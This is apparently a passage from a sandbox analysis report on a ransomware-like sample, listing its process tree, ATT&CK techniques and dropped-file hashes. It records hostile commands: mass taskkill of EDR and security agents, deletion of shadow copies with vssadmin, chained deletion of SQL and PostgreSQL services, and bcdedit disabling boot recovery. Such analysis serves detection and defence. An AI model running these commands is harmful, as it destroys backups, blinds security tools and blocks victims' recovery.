C:\Windows\SysWOW64\taskkill.exetaskkill /IM SecureCRTPortable.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBox.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VBoxSVC.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM VirtualBoxVM.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM abs_deployer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_monitor.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfupdatemgr.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ipc_proxy.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_agent.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM edr_sec_plan.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sfavsvc.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxMonitorService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DataShareBox.ShareBoxService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchangeService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Jointsky.CloudExchange.NodeService.ein /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM perl.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM java.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM emagent.exe /F5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsServer.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AppMain.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM easservice.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Kingdee6.1.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM QyKernel.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM QyFragment.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UserClient.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCEFExternal.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCEFExternal.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCEFExternal.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ComputerZTray.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ComputerZService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ClearCache.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ProLiantMonitor.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ChsIME.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bugreport.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNWebServer.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM UI0Detect.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNCore.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM gnwayDDNS.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GNWebHelper.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM php-cgi.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ESLUSBService.exe /F5⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CQA.exe /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Kekcoek.pif /F5⤵
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe3⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exe"C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc delete "MSSQLFDLauncher"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures4⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no4⤵
-
-
-
-
C:\Windows\system32\attrib.exeattrib -s -h C:\Users\Admin\AppData\Local\Temp\3B8A2BCD9E8DD805793CC95C74D30F20EBC5714EA249D165AFAC29D1F3B0ACE0.bat.exe2⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc1⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OUExMzI0N0QtQ0MyMi00RTYyLThFNjctN0JCNUZERDM1QjhBfSIgdXNlcmlkPSJ7RDhDODA3RTktREFCQi00QjZELUFBNEEtRUU2QjlFMEU3OThBfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7NEMzOTkyMjUtRTIzQS00MzlFLUExQjUtQTUyNEM4MzFEMjRFfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIzIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDY4ODkiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTM2NTgwOTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1NDMwOTIxMzc5Ii8-PC9hcHA-PC9yZXF1ZXN0Pg2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
Network
MITRE ATT&CK Enterprise v15
Execution
System Services
2Service Execution
2Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Indicator Removal
2File Deletion
2Discovery
Network Share Discovery
1Peripheral Device Discovery
1Query Registry
2Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1System Time Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
477KB
MD54e8255de655e1844041a72d0b1731e8c
SHA1601f080310225f7321ef1618a125a57a6e44c7c9
SHA256a494b58dc3a2cee3e6b8c3bf12d462028afe0d8a9799303e59416e243a3a629a
SHA5123aeb74fcf1bb3bed3bb32c097d185915cf9399f9ffa2c1f5b72e52a74ce50f94dfc25caf9fb56275947a942453f62c48788b5e5e58e0d93cdfa4bc57cb6688e7
-
Filesize
1KB
MD53afab309f72e46692b930930c8deb55d
SHA1f1e08c48d22b3727ce595b57042a843f3b56ec04
SHA256e8bf05f89415276254da7fb0901117886f78b0937aaa1ecf4e0431205a3a77cc
SHA512d8530a227660cac8fd8c02b0b60dc80ee37d316b0e5f17e0c53be1948b5e7c8cc3b45988065e948b594d3b6c335774de392bbfa78a2e86ed3f0a5ce8d623271e
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
19KB
MD54ec6e679b197522ad3988de08af0f77b
SHA1fe3072b2286a61229cb4cfa055feea022ac9076a
SHA256bcfea7ee45acca5c4f8d20f8a2becb56eaa9ead2b614b66e31a5c01fe4704e0c
SHA5125e522c0e75461c089b2276e4d1c9af8ee537aa1878bd8052c1e3685b603d65b57759f7684e91fdab995f17b202267acc7916cee552963903cabafbf697df51f3
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
39KB
MD50e115cd39c3c92a0c3736555c022c7f3
SHA13fa79012dfdac626a19017ed6974316df13bc6ff
SHA25622816dc4dda6beec453e9a48520842b8409c54933cc81f1a338bc77199ab917e
SHA512034e1286dff6cf653a69b2f46b04e45c47e8c2c4e7be6af0af4259d71ffd2967f6e24b722cb58a618419ac2ba25ca5e4d3d833e9147ad01c8064b17ab0e14318
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
172KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
6.5MB
-
Filesize
120KB
-
Filesize
584KB
-
Filesize
1.4MB
-
Filesize
120KB
-
Filesize
472KB
-
Filesize
6.1MB
-
Filesize
2.0MB
-
Filesize
104KB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
4KB
-
Filesize
3.3MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
4KB